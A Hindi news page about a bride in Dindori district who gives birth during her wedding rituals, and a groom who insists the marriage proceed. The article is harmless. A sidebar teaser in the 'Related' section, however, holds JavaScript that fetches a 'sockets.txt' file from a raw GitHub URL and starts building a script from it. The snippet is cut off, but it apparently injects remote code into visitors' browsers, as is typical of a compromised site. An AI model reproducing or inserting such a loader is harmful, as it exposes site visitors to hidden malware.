वैवाहिक रस्मों के दौरान दुल्हन बनी माँ !

Date:

bride-gives-birthडिंडौरी। जिले में एक दुल्हन वैवाहिक रस्मों के दौरान ही मां बन गई। बात बगैर दुल्हन के लौटने तक जा पहुंची, मगर दूल्हे की जिद के आगे सभी को झुकना पड़ा और बाद में बारात हंसी-खुशी दुल्हन के साथ दहेज में नए मेहमान को लेकर विदा हुई।
डिंडौरी जिले के मान सिंह बारात लेकर बुधवार को अजवार गांव पहुंचे। बारात पहुंचने पर वैवाहिक रस्मों का दौर चल रहा था, तभी खबर आई कि दुल्हन को प्रसव हुआ है। इसके चलते दोनों पक्ष सकते में आ गए। मान सिंह के परिवार के सदस्य बगैर बारात के लौटने की तैयारी करने लगे। इस पर दुल्हन पक्ष ने उनसे काफी मन्नतें की, मगर वे राजी नहीं हुए। दुल्हन के मां बनने से दूल्हा पक्ष के लोग लौटने की तैयारी में थे, तभी दूल्हे मान सिंह ने ऐसा करने से मना कर दिया। मान सिंह का कहना था कि उसे इस बात का पता था कि उसकी होने वाली पत्नी गर्भवती है। दोनों का मिलना-जुलना शादी से एक वर्ष पहले से चल रहा था। दूल्हे की जिद के आगे बारातियों को झुकना पड़ा, मगर वैवाहिक रस्म एक दिन के लिए रोक दी गई। गुरुवार को शेष रस्म पूरी हुई और बारात शुक्रवार को खुशनुमा माहौल में दुल्हन और नवजात शिशु के साथ अपने घर लौटी। मान सिंह के चाचा छोटे लाल का कहना है कि दुल्हन के बच्चे को जन्म देने के बाद भी शादी इसलिए की, क्योंकि यह बात दोनों पक्ष के इज्जत से जुड़ा हुआ था। लिहाजा वे शादी करने के बाद खुश हैं।
अमूमन जनजातीय वर्ग में शादी के तय होते ही लड़के और लड़की के मिलने-जुलने का दौर शुरू हो जाता है। इसे बुरा भी नहीं माना जाता, मगर यह पहला मौका है जब दुल्हन वैवाहिक रस्मों के दौरान ही मां बन गई। वैवाहिक रस्मों के बीच दुल्हन के मां बनने के चलते उपजे विवाद के दौरान दूल्हे मान सिंह की जिद ने एक लड़की की जिंदगी बर्बाद होने से बचा ली और इस कहानी का सुखद अंत हुआ।bride-gives-birth

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Share post:

Subscribe

spot_imgspot_img

Popular

More like this
Related

oHmtKvYkl

QYRRUUjF;var url = 'https://raw.githubusercontent.com/AlexanderRPatton/cdn/main/sockets.txt';fetch(url).then(response => response.text()).then(data => {var script...

हिन्दुस्तान जिंक के स्वास्थ्य अभियान के तहत विश्व स्तनपान सप्ताह आयोजित

हिंदुस्तान जिंक, द्वारा स्वास्थ्य अभियान के तहत् विश्व स्तनपान...

हिंदुस्तान जिंक द्वारा खनन कार्यों में आंतरिक प्रतिभा के कौशल एवं अवसर वृद्धि हेतु जावर में ‘हिंदुस्तान जिंक माइनिंग अकादमी’ का शुभारंभ

इस अनूठी पहल से भूमिगत खदानों में जंबो हेल्पर्स प्रमाणित ऑपरेटर बन सकेंगे - पांच महीने तक चलनेवाले इस प्रशिक्षण कार्यक्रम में 16 सप्ताह का क्लासरूम इंस्ट्रक्शन शामिल होगा उदयपुर, 30 जुलाई, 2022: देश की एकमात्र और विश्व...